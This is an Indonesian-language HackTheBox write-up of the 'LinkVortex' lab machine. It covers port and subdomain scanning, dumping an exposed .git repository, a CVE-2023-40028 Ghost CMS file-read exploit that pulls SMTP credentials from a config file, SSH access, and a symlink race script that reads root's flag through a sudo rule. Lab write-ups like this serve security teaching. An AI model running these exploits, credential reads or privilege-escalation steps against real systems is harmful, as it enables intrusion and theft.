- Published on
HACKTHEBOX - LinkVortex WriteUp
- Authors
- Name
- Alvin Dhiyaul H
Reconnaissance
Melakukan Port Scanning menggunakan Nmap untuk mengetahui service yang sedang berjalan di server.
# Nmap 7.95 scan initiated Mon Dec 9 08:10:10 2024 as: nmap -sC -sV -o nmap 10.10.11.47
Nmap scan report for 10.10.11.47
Host is up (0.052s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_ 256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open http Apache httpd
|_http-title: Did not follow redirect to http://linkvortex.htb/
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 9 08:10:31 2024 -- 1 IP address (1 host up) scanned in 21.03 seconds
Dari informasi diatas kita dapat mengetauhi bahwasanya terdapat sebuah web service yang berjalan di port 80 dengan hostname likvortex.htb, lalu supaya kita dapat mengakses service web tersebut kita harus menambahkan hostname ke file config yaitu /etc/passwd
sudo echo "10.10.11.47 linkvortex.htb" | sudo tee -a /etc/hosts
Kemudian setelah menambahkan hostname kita dapat melakukan enumerasi secara lanjut terhadap subdomain yang terdapat pada server menggunakan ffuf tools.
alvin@0xOff LinkVortex % ffuf -u http://linkvortex.htb -H "Host: FUZZ.linkvortex.htb" -w /Users/alvin/Documents/TOOLS/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -c -t 64 -fs 230
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://linkvortex.htb
:: Wordlist : FUZZ: /Users/alvin/Documents/TOOLS/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.linkvortex.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 64
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 230
________________________________________________
dev [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 83ms]
:: Progress: [114441/114441] :: Job [1/1] :: 3 req/sec :: Duration: [0:02:58] :: Errors: 0 ::
Dari hasil enumerasi subdomain kita mendapat sebuah informasi bahwasanya terdapat sebuah subdomain dev.linkvortex.htb, selanjutnya kita dapat melakukan Directory Fuzzing pada subdomain dev.linkvortex.htb untuk mencari informasi sensitif pada subdomain tersebut menggunakan Tools Dirsearch.
alvin@0xOff LinkVortex % dirsearch -u http://dev.linkvortex.htb --include-status 200
_|. _ _ _ _ _ _|_ v0.4.3.post1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /Users/alvin/Documents/HACKTHEBOX/Easy/LinkVortex/reports/http_dev.linkvortex.htb/_24-12-09_22-54-05.txt
Target: http://dev.linkvortex.htb/
[22:54:05] Starting:
[22:54:09] 200 - 557B - /.git/
[22:54:09] 200 - 73B - /.git/description
[22:54:09] 200 - 201B - /.git/config
[22:54:09] 200 - 41B - /.git/HEAD
[22:54:09] 200 - 620B - /.git/hooks/
[22:54:09] 200 - 402B - /.git/info/
[22:54:09] 200 - 240B - /.git/info/exclude
[22:54:09] 200 - 175B - /.git/logs/HEAD
[22:54:09] 200 - 401B - /.git/logs/
[22:54:09] 200 - 147B - /.git/packed-refs
[22:54:09] 200 - 418B - /.git/objects/
[22:54:09] 200 - 393B - /.git/refs/
[22:54:10] 200 - 691KB - /.git/index
Task Completed
Dan dari proses Fuzzing kita menemukan bahwasanya terdapat sebuah vulnerability (CWE-527) Exposure of Version-Control Repository to an Unauthorized Control Sphere.
Kemudian kita dapat Men-Dump semua isi dari direktori /.git menggunakan tool git-dumper untuk mengetahui secara lebih mendalam apa informasi sensitif yang ada di direktori tersebut.
alvin@0xOff LinkVortex % git-dumper http://dev.linkvortex.htb/.git Linkvortexgit
[-] Testing http://dev.linkvortex.htb/.git/HEAD [200]
[-] Testing http://dev.linkvortex.htb/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://dev.linkvortex.htb/.gitignore [404]
[-] http://dev.linkvortex.htb/.gitignore responded with status code 404
[-] Fetching http://dev.linkvortex.htb/.git/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/refs/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/packed-refs [200]
[-] Fetching http://dev.linkvortex.htb/.git/shallow [200]
[-] Fetching http://dev.linkvortex.htb/.git/description [200]
[-] Fetching http://dev.linkvortex.htb/.git/logs/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/index [200]
[-] Fetching http://dev.linkvortex.htb/.git/HEAD [200]
[-] Fetching http://dev.linkvortex.htb/.git/config [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/info/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/refs/tags/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/logs/HEAD [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/commit-msg.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-commit.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/post-update.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-push.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-receive.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/push-to-checkout.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/50/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/update.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/e6/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/pack/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/info/exclude [200]
[-] Fetching http://dev.linkvortex.htb/.git/refs/tags/v5.57.3 [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/50/864e0261278525197724b394ed4292414d9fec [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/e6/54b0ed7f9c9aedf3180ee1fd94e7e43b29f000 [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/pack/pack-0b802d170fe45db10157bb8e02bfc9397d5e9d87.pack [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/pack/pack-0b802d170fe45db10157bb8e02bfc9397d5e9d87.idx [200]
[-] Running git checkout .
Setelah berhasil Men-Dumping semua isi dari direktori ./git,saya mendapat informasi bahwasanya web service yang berjalan menggunakan sebuah Content Management System (CMS) Ghost dengan versi 5.58.0.
alvin@0xOff LinkVortex % ls Linkvortexgit
Dockerfile.ghost LICENSE PRIVACY.md README.md SECURITY.md apps ghost nx.json package.json yarn.lock
alvin@0xOff LinkVortex % cat Linkvortexgit/Dockerfile.ghost
FROM ghost:5.58.0
# Copy the config
COPY config.production.json /var/lib/ghost/config.production.json
# Prevent installing packages
RUN rm -rf /var/lib/apt/lists/* /etc/apt/sources.list* /usr/bin/apt-get /usr/bin/apt /usr/bin/dpkg /usr/sbin/dpkg /usr/bin/dpkg-deb /usr/sbin/dpkg-deb
# Wait for the db to be ready first
COPY wait-for-it.sh /var/lib/ghost/wait-for-it.sh
COPY entry.sh /entry.sh
RUN chmod +x /var/lib/ghost/wait-for-it.sh
RUN chmod +x /entry.sh
ENTRYPOINT ["/entry.sh"]
CMD ["node", "current/index.js"]
Expanding The Attack Surface
NOTE
Yang dimana Ghost CMS dengan versi 5.58.0 memliki sebuah vulnerability dengan Id CVE-2023-40028. Kerentanan ini memungkinkan pengguna yang telah terautentikasi untuk mengunggah symlink, yang dapat mengakibatkan eksploitasi berupa arbitrary file read vulnerabilities.
Selain terdapat informasi sebuah CMS & Version yang digunakan, saya juga menemukan sebuah credential password yang ada pada sebuah file js di direktori /ghost/core/test/regression/api/admin/authentication.test.js
alvin@0xOff LinkVortex % cat Linkvortexgit/ghost/core/test/regression/api/admin/authentication.test.js | grep password
const password = 'OctopiFociPilfer45';
password,
await agent.loginAs(email, password);
password: 'thisissupersafe',
password: 'thisissupersafe',
const password = 'thisissupersafe';
Initial Access
Sehingga kita dapat memanfaatkan sebuah script exploitation berikut CVE-2023-40028 untuk mendapatkan akses shell.
alvin@0xOff LinkVortex % ./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45
WELCOME TO THE CVE-2023-40028 SHELL
file>
Sebelumnya perlu kita ingat pada saat kita membuka file konfigurasi docker (Dockerfile.ghost), terdapat sebuah baris script yang di gunakan untuk melakukan konfigurasi pada production yaitu file config.production.json.
# Copy the config
COPY config.production.json /var/lib/ghost/config.production.json
Sehingga kita dapat melakukan arbitrary file read pada shell yang sudah berhasil kita dapatkan sebelumnya.
alvin@0xOff LinkVortex % ./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45
WELCOME TO THE CVE-2023-40028 SHELL
file> /var/lib/ghost/config.production.json
"mail": {
"transport": "SMTP",
"options": {
"service": "Google",
"host": "linkvortex.htb",
"port": 587,
"auth": {
"user": "bob@linkvortex.htb",
"pass": "fibber-talented-worth"
}
}
}
Dan dari hasil mengakses file config.production.json kita mendapat sebuah user & passwd yang dapat kita gunakan untuk Remote access melalui SSH.
Foothold
Kemudian kita dapat mengakses server melalui ssh dengan memanfaatkan credential yang telah berhasil kita temukan sebelumnya.
alvin@0xOff LinkVortex % ssh bob@linkvortex.htb
bob@linkvortex.htb's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Dec 9 16:34:05 2024 from 10.10.14.112
bob@linkvortex:~$
Getting user flag
Kemudian kita telah berhasil mendapatkan flag dari user.
bob@linkvortex:~$ whoami
bob
bob@linkvortex:~$ cat user.txt
be53f3*****************b60a51
bob@linkvortex:~$
Privilege Escalation to Root Access
Terdapat sebuah informasi berikut ketika kita menjalankan command sudo -l
bob@linkvortex:~$ sudo -l
Matching Defaults entries for bob on linkvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, env_keep+=CHECK_CONTENT
User bob may run the following commands on linkvortex:
(ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png
Kemudian pada file clean_symlink.sh terdapat sebuah script seperti dibawah ini.
bob@linkvortex:~$ cat /opt/ghost/clean_symlink.sh
#!/bin/bash
QUAR_DIR="/var/quarantined"
if [ -z $CHECK_CONTENT ];then
CHECK_CONTENT=false
fi
LINK=$1
if ! [[ "$LINK" =~ \.png$ ]]; then
/usr/bin/echo "! First argument must be a png file !"
exit 2
fi
if /usr/bin/sudo /usr/bin/test -L $LINK;then
LINK_NAME=$(/usr/bin/basename $LINK)
LINK_TARGET=$(/usr/bin/readlink $LINK)
if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
/usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
/usr/bin/unlink $LINK
else
/usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
/usr/bin/mv $LINK $QUAR_DIR/
if $CHECK_CONTENT;then
/usr/bin/echo "Content:"
/usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
fi
fi
fi
NOTE
Pengguna bob dapat menjalankan skrip /opt/ghost/clean_symlink.sh dengan sudo tanpa password menggunakan wildcard *.png. Jika skrip tidak memvalidasi input dengan baik, wildcard ini bisa dimanipulasi untuk menyisipkan perintah berbahaya atau mengeksploitasi hak akses root melalui kelemahan dalam skrip terse
Sehingga kita dapat membuat sebuah scripting sederhana seperti di bawah ini untuk dapat mengambil flag root.txt .
#!/bin/bash
export CHECK_CONTENT=true
LINK="malicious_link.png"
ln -s /tmp/salom $LINK
sudo /usr/bin/bash /opt/ghost/clean_symlink.sh $LINK &
(sleep 0.03 && ln -sf /root/root.txt $LINK) &
Execute file & gain root flag
bob@linkvortex:~$ nano gain-root.sh
bob@linkvortex:~$ chmod +x gain-root.sh
bob@linkvortex:~$ ./gain-root.sh
bob@linkvortex:~$ Link found [ malicious_link.png ] , moving it to quarantine
Content:
b4b4****************1017
Dan kita telah berhasil mendapat flag user pada server.